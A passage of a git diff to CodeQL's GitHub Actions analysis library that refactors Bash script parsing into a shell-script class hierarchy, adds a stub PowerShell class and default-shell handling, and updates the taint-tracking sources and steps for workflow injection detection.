new) + | + new order by round + ) + } + + string getACmd() { result = this.getCmd(_) } + + override string getCommand(int i) { + result = this.getCmd(i) and + // exclude variable declarations + not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + override string getACommand() { result = this.getCommand(_) } + + override string getFileReadCommand(int i) { + result = this.getStmt(i) and + result.matches(Bash::fileReadCommand() + "%") + } + + override string getAFileReadCommand() { result = this.getFileReadCommand(_) } + + override predicate getAssignment(int i, string name, string data) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + data = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + override predicate getAnAssignment(string name, string data) { this.getAssignment(_, name, data) } + + override predicate getAWriteToGitHubEnv(string name, string data) { + exists(string raw | + Bash::extractFileWrite(this.getRawScript(), "GITHUB_ENV", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubOutput(string name, string data) { + exists(string raw | + Bash::extractFileWrite(this.getRawScript(), "GITHUB_OUTPUT", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubPath(string data) { + Bash::extractFileWrite(this.getRawScript(), "GITHUB_PATH", data) + } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) + } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) + } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) + } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_PATH", _) + } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_PATH", _) + } + + override predicate fileToGitHubEnv(string path) { + Bash::fileToFileWrite(this, "GITHUB_ENV", path) + } + + override predicate fileToGitHubOutput(string path) { + Bash::fileToFileWrite(this, "GITHUB_OUTPUT", path) + } + + override predicate fileToGitHubPath(string path) { + Bash::fileToFileWrite(this, "GITHUB_PATH", path) + } +} module Bash { string stmtSeparator() { result = ";" } @@ -23,7 +319,7 @@ module Bash { result = pipeSeparator() } - string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + string fileReadCommand() { result = ["<", "cat", "jq", "yq", "tail", "head"] } /** Checks if expr is a bash command substitution */ bindingset[expr] @@ -133,8 +429,7 @@ module Bash { string script, string cmd, string file, string content, string filters ) { exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + regexp = "(?i)(echo|printf)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" and @@ -145,13 +440,12 @@ module Bash { bindingset[script] predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = script.regexpCapture(regexp, 4) and value = trimQuotes(script.regexpCapture(regexp, 5)) or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = "" and value = trimQuotes(script.regexpCapture(regexp, 4)) @@ -262,57 +556,38 @@ module Bash { } /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ - predicate fileToFileWrite(Run run, string file_var, string path) { + predicate fileToFileWrite(BashShellScript script, string file_var, string path) { exists(string regexp, string stmt, string file_expr | regexp = "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - stmt = run.getAStmt() and + stmt = script.getAStmt() and file_expr = trimQuotes(stmt.regexpCapture(regexp, 5)) and path = stmt.regexpCapture(regexp, 2) and containsParameterExpansion(file_expr, file_var, _, _) ) } - predicate fileToGitHubEnv(Run run, string path) { fileToFileWrite(run, "GITHUB_ENV", path) } - - predicate fileToGitHubOutput(Run run, string path) { fileToFileWrite(run, "GITHUB_OUTPUT", path) } - - predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run, "GITHUB_PATH", path) } - - bindingset[snippet] - predicate outputsPartialFileContent(Run run, string snippet) { - // e.g. - // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - exists(int i, string line, string cmd | - run.getStmt(i) = line and - line.indexOf(snippet.regexpReplaceAll("^\\$\\(", "").regexpReplaceAll("\\)$", "")) > -1 and - run.getCommand(i) = cmd and - cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - ) - } - /** * Holds if the Run scripts contains an access to an environment variable called `var` * which value may get appended to the GITHUB_XXX special file */ - predicate envReachingGitHubFileWrite(Run run, string var, string file_var, string field) { + predicate envReachingGitHubFileWrite( + BashShellScript script, string var, string file_var, string field + ) { exists(string file_write_value | ( file_var = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(field, file_write_value) + script.getAWriteToGitHubEnv(field, file_write_value) or file_var = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(field, file_write_value) + script.getAWriteToGitHubOutput(field, file_write_value) or file_var = "GITHUB_PATH" and field = "PATH" and - run.getAWriteToGitHubPath(file_write_value) + script.getAWriteToGitHubPath(file_write_value) ) and - envReachingRunExpr(run, var, file_write_value) + envReachingRunExpr(script, var, file_write_value) ) } @@ -321,11 +596,11 @@ module Bash { * Where the expression is a string captured from the Run's script. */ bindingset[expr] - predicate envReachingRunExpr(Run run, string var, string expr) { + predicate envReachingRunExpr(BashShellScript script, string var, string expr) { exists(string var2, string value2 | // VAR2=${VAR:-default} (var2=value2) // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) - run.getAnAssignment(var2, value2) and + script.getAnAssignment(var2, value2) and containsParameterExpansion(value2, var, _, _) and containsParameterExpansion(expr, var2, _, _) ) @@ -339,33 +614,42 @@ module Bash { * Holds if the Run scripts contains a command substitution (`cmd`) * which output may get appended to the GITHUB_XXX special file */ - predicate cmdReachingGitHubFileWrite(Run run, string cmd, string file_var, string field) { + predicate cmdReachingGitHubFileWrite( + BashShellScript script, string cmd, string file_var, string field + ) { exists(string file_write_value | ( file_var = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(field, file_write_value) + script.getAWriteToGitHubEnv(field, file_write_value) or file_var = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(field, file_write_value) + script.getAWriteToGitHubOutput(field, file_write_value) or file_var = "GITHUB_PATH" and field = "PATH" and - run.getAWriteToGitHubPath(file_write_value) + script.getAWriteToGitHubPath(file_write_value) ) and - ( - // cmd output is assigned to a second variable (var2) and var2 reaches the file write - exists(string var2, string value2 | - // VAR2=$(cmd) - // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) - run.getAnAssignment(var2, value2) and - containsCmdSubstitution(value2, cmd) and - containsParameterExpansion(file_write_value, var2, _, _) - ) - or - // var reaches the file write directly - // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) - containsCmdSubstitution(file_write_value, cmd) - ) + cmdReachingRunExpr(script, cmd, file_write_value) + ) + } + + /** + * Holds if a command output is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ + bindingset[expr] + predicate cmdReachingRunExpr(BashShellScript script, string cmd, string expr) { + // cmd output is assigned to a second variable (var2) and var2 reaches the file write + exists(string var2, string value2 | + // VAR2=$(cmd) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + script.getAnAssignment(var2, value2) and + containsCmdSubstitution(value2, cmd) and + containsParameterExpansion(expr, var2, _, _) ) + or + // var reaches the file write directly + // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) + containsCmdSubstitution(expr, cmd) } } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index ae4405a185bd..fb6fdf2d74b8 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -3,6 +3,7 @@ private import codeql.Locations private import codeql.actions.security.ControlChecks import codeql.actions.config.Config import codeql.actions.Bash +import codeql.actions.PowerShell bindingset[expr] string normalizeExpr(string expr) { diff --git a/ql/lib/codeql/actions/PowerShell.qll b/ql/lib/codeql/actions/PowerShell.qll new file mode 100644 index 000000000000..1727930c2a3f --- /dev/null +++ b/ql/lib/codeql/actions/PowerShell.qll @@ -0,0 +1,50 @@ +private import codeql.actions.Ast + +class PowerShellScript extends ShellScript { + PowerShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches("pwsh%") + ) + } + + override string getStmt(int i) { none() } + + override string getAStmt() { none() } + + override string getCommand(int i) { none() } + + override string getACommand() { none() } + + override string getFileReadCommand(int i) { none() } + + override string getAFileReadCommand() { none() } + + override predicate getAssignment(int i, string name, string data) { none() } + + override predicate getAnAssignment(string name, string data) { none() } + + override predicate getAWriteToGitHubEnv(string name, string data) { none() } + + override predicate getAWriteToGitHubOutput(string name, string data) { none() } + + override predicate getAWriteToGitHubPath(string data) { none() } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { none() } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { none() } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { none() } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { none() } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { none() } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { none() } + + override predicate fileToGitHubEnv(string path) { none() } + + override predicate fileToGitHubOutput(string path) { none() } + + override predicate fileToGitHubPath(string path) { none() } +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index eaf1ae871a9f..43772a978c58 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -62,6 +62,7 @@ private newtype TAstNode = n.lookup("jobs") instanceof YamlMapping } or TRunsNode(YamlMapping n) { exists(CompositeActionImpl a | a.getNode().lookup("runs") = n) } or + TDefaultsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("defaults") = n) } or TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or @@ -141,6 +142,19 @@ abstract class AstNodeImpl extends TAstNode { env.getParentNode().getAChildNode*() = this ) } + + ScalarValueImpl getInScopeDefaultValue(string name, string prop) { + exists(DefaultsImpl dft | + this.getEnclosingJob().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + or + not exists(DefaultsImpl dft | this.getEnclosingJob() = dft.getParentNode()) and + exists(DefaultsImpl dft | + this.getEnclosingWorkflow().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + } } class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { @@ -165,6 +179,61 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { string getValue() { result = value.getValue() } } +class ShellScriptImpl extends ScalarValueImpl { + ShellScriptImpl() { exists(YamlMapping run | run.lookup("run").(YamlScalar) = this.getNode()) } + + string getRawScript() { result = this.getValue().regexpReplaceAll("\\\\\\s*\n", "") } + + RunImpl getEnclosingRun() { result.getNode().lookup("run") = this.getNode() } + + abstract string getStmt(int i); + + abstract string getAStmt(); + + abstract string getCommand(int i); + + string getACommand() { + if this.getEnclosingRun().getShell().matches("bash%") + then result = this.(BashShellScript).getACommand() + else + if this.getEnclosingRun().getShell().matches("pwsh%") + then result = this.(PowerShellScript).getACommand() + else result = "NOT IMPLEMENTED" + } + + abstract string getFileReadCommand(int i); + + abstract string getAFileReadCommand(); + + abstract predicate getAssignment(int i, string name, string data); + + abstract predicate getAnAssignment(string name, string data); + + abstract predicate getAWriteToGitHubEnv(string name, string data); + + abstract predicate getAWriteToGitHubOutput(string name, string data); + + abstract predicate getAWriteToGitHubPath(string data); + + abstract predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubPathWrite(string var); + + abstract predicate getACmdReachingGitHubPathWrite(string cmd); + + abstract predicate fileToGitHubEnv(string path); + + abstract predicate fileToGitHubOutput(string path); + + abstract predicate fileToGitHubPath(string path); +} + class ExpressionImpl extends AstNodeImpl, TExpressionNode { YamlNode key; YamlString value; @@ -493,6 +562,28 @@ class InputsImpl extends AstNodeImpl, TInputsNode { } } +class DefaultsImpl extends AstNodeImpl, TDefaultsNode { + YamlMapping n; + + DefaultsImpl() { this = TDefaultsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "DefaultsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + ScalarValueImpl getValue(string name, string prop) { + n.lookup(name).(YamlMapping).lookup(prop) = result.getNode() + } +} + class InputImpl extends AstNodeImpl, TInputNode { YamlValue n; @@ -1314,20 +1405,18 @@ class ExternalJobImpl extends JobImpl, UsesImpl { class RunImpl extends StepImpl { YamlScalar script; + ScalarValueImpl scriptScalar; - RunImpl() { this.getNode().lookup("run") = script } - - string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } - - ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } - - ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } + RunImpl() { + this.getNode().lookup("run") = script and + scriptScalar = TScalarValueNode(script) + } override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } - /** Gets the working directory for this `runs` mapping. */ + /** Gets the working directory for this `run` mapping. */ string getWorkingDirectory() { if exists(n.lookup("working-directory").(YamlString).getValue()) then @@ -1339,268 +1428,19 @@ class RunImpl extends StepImpl { else result = "GITHUB_WORKSPACE/" } - private string lineProducer(int i) { - result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) - } - - private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { - exists(string line | line = this.lineProducer(k) | - exists(int i, int j | - cmdSubs = - // $() cmd substitution - line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) - .regexpReplaceAll("^\\$\\(", "") - .regexpReplaceAll("\\)$", "") and - id = "cmdsubs:" + k + ":" + i + ":" + j - ) - or - exists(int i, int j | - // `...` cmd substitution - cmdSubs = - line.regexpFind("\\`[^\\`]+\\`", i, j) - .regexpReplaceAll("^\\`", "") - .regexpReplaceAll("\\`$", "") and - id = "cmd:" + k + ":" + i + ":" + j - ) - ) - } - - private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { - old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and - this.cmdSubstitutionReplacement(old, new, _) - } - - private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.lineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(target, replacement) - ) - } - - private string cmdSubstitutedLineProducer(int i) { - // script lines where any command substitution has been replaced with a unique placeholder - result = - max(int round, string new | - this.doReplaceCmdSubstitutions(i, round, _, new) - | - new order by round - ) - or - this.cmdSubstitutionReplacement(result, _, i) - } - - private predicate quotedStringReplacement(string quotedStr, string id) { - exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | - exists(int i, int j | - // double quoted string - quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and - id = - "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + - quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") - ) - or - exists(int i, int j | - // single quoted string - quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and - id = - "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + - quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") - ) - ) - } - - private predicate rankedQuotedStringReplacements(int i, string old, string new) { - old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and - this.quotedStringReplacement(old, new) - } - - private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.cmdSubstitutedLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doReplaceQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(target, replacement) - ) - } - - private string quotedStringLineProducer(int i) { - result = - max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) - } - - private string stmtProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and - // when splitting the line with a separator that is not present, the result is the original line which may contain other separators - // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::splitSeparator()) > -1 - } - - private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.stmtProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - private string restoredStmtQuotedStringLineProducer(int i) { - result = - max(int round, string new | - this.doStmtRestoreQuotedStrings(i, round, _, new) - | - new order by round - ) - } - - private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.restoredStmtQuotedStringLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - string getStmt(int i) { - result = - max(int round, string new | - this.doStmtRestoreCmdSubstitutions(i, round, _, new) - | - new order by round - ) - } - - string getAStmt() { result = this.getStmt(_) } - - private string cmdProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and - // when splitting the line with a separator that is not present, the result is the original line which may contain other separators - // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::separator()) > -1 - } - - private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.cmdProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - private string restoredCmdQuotedStringLineProducer(int i) { - result = - max(int round, string new | - this.doCmdRestoreQuotedStrings(i, round, _, new) - | - new order by round - ) - } - - private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.restoredCmdQuotedStringLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - string getCmd(int i) { - result = - max(int round, string new | - this.doCmdRestoreCmdSubstitutions(i, round, _, new) - | - new order by round - ) - } - - string getACmd() { result = this.getCmd(_) } - - string getCommand(int i) { - result = this.getCmd(i) and - // exclude variable declarations - not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and - // exclude the following keywords - not result = - [ - "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", - "esac", "{", "}" - ] - } - - string getACommand() { result = this.getCommand(_) } - - predicate getAssignment(int i, string name, string value) { - exists(string stmt | - stmt = this.getStmt(i) and - name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and - value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) - ) - } - - predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } - - predicate getAWriteToGitHubEnv(string name, string value) { - exists(string raw | - Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and - Bash::extractVariableAndValue(raw, name, value) - ) - } - - predicate getAWriteToGitHubOutput(string name, string value) { - exists(string raw | - Bash::extractFileWrite(this.getScript(), "GITHUB_OUTPUT", raw) and - Bash::extractVariableAndValue(raw, name, value) - ) - } - - predicate getAWriteToGitHubPath(string value) { - Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) - } - - predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { - Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) - } - - predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { - Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + /** Gets the shell for this `run` mapping. */ + string getShell() { + if exists(n.lookup("shell").(YamlString).getValue()) + then result = n.lookup("shell").(YamlString).getValue() + else + if exists(this.getInScopeDefaultValue("run", "shell")) + then result = this.getInScopeDefaultValue("run", "shell").getValue() + else result = "bash" } - predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { - Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) - } + ShellScriptImpl getScript() { result = scriptScalar } - predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { - Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) - } + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } } /** diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8a6e52309fb2..5ceab79820bc 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -282,7 +282,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { ( child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr() or - child = super.getScriptScalar() + child = super.getScript() ) and l = child.getLocation() | diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index f1fb2073ed0d..b30fd5495ed3 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -86,7 +86,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { exists(Uses uses | checkout = uses and uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or checkout instanceof GitMutableRefCheckout @@ -97,9 +98,9 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { or checkout instanceof GhSHACheckout ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and - run.getACommand() = cmd and + run.getScript().getACommand() = cmd and cmd.indexOf("git") = 0 and untrustedGitCommandsDataModel(cmd_regex, flag) and cmd.regexpMatch(cmd_regex) @@ -127,8 +128,8 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { // PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) // BODY=$(jq -r '.issue.body' "$GITHUB_EVENT_PATH" | sed -n '3p') GitHubEventPathSource() { - this.asExpr() = run.getScriptScalar() and - run.getACommand() = cmd and + this.asExpr() = run.getScript() and + run.getScript().getACommand() = cmd and cmd.matches("jq%") and cmd.matches("%GITHUB_EVENT_PATH%") and exists(string regexp | @@ -207,10 +208,11 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - exists(Uses u | - this.asExpr() = u and - u.getCallee() = "actions/checkout" and - exists(u.getArgument("ref")) + exists(Uses uses | + this.asExpr() = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or this.asExpr() instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 787a5f720845..0f7e906685b1 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,7 +23,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(Run run, string var, string field | run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run and - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field) and c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } @@ -35,8 +35,8 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: run.getInScopeEnvVarExpr(var) = pred.asExpr() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_ENV", field) and - c = any(DataFlow::FieldContent ct | ct.getName() = field) //and + run.getScript().getAnEnvReachingGitHubEnvWrite(var, field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } @@ -55,12 +55,12 @@ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Dat or exists(FileSource source | source.asExpr().(Step).getAFollowingStep() = run and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getAFileReadCommand() = cmd ) ) and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", key) and + run.getScript().getACmdReachingGitHubOutputWrite(cmd, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and + pred.asExpr() = run.getScript() and succ.asExpr() = run ) } @@ -80,12 +80,12 @@ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFl or exists(FileSource source | source.asExpr().(Step).getAFollowingStep() = run and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getAFileReadCommand() = cmd ) ) and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and + pred.asExpr() = run.getScript() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() ) diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index de64a0dd6f4c..e9d5a44c929a 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -22,14 +22,14 @@ class AdditionalTaintStep extends Unit { } /** - * A download artifact step followed by a step that may use downloaded artifacts. + * A file source step followed by a Run step may read the file. */ predicate fileDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(FileSource source, Run run | pred = source and source.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 18ff398ebab2..a0309437292a 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -17,11 +17,11 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { bindingset[var] predicate envToArgInjSink(string var, Run run, string command) { exists(string argument, string cmd, string regexp, int command_group, int argument_group | - run.getACommand() = cmd and + run.getScript().getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and command = cmd.regexpCapture(regexp, command_group) and argument = cmd.regexpCapture(regexp, argument_group) and - Bash::envReachingRunExpr(run, var, argument) and + 